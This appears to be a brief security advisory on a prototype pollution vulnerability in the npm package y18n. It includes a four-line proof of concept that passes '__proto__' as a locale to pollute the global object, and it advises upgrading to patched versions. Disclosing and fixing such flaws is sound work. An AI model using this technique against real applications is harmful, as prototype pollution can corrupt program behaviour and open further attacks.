All the vulnerabilities related to the version 5.0.2 of the package
Prototype Pollution in y18n
The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.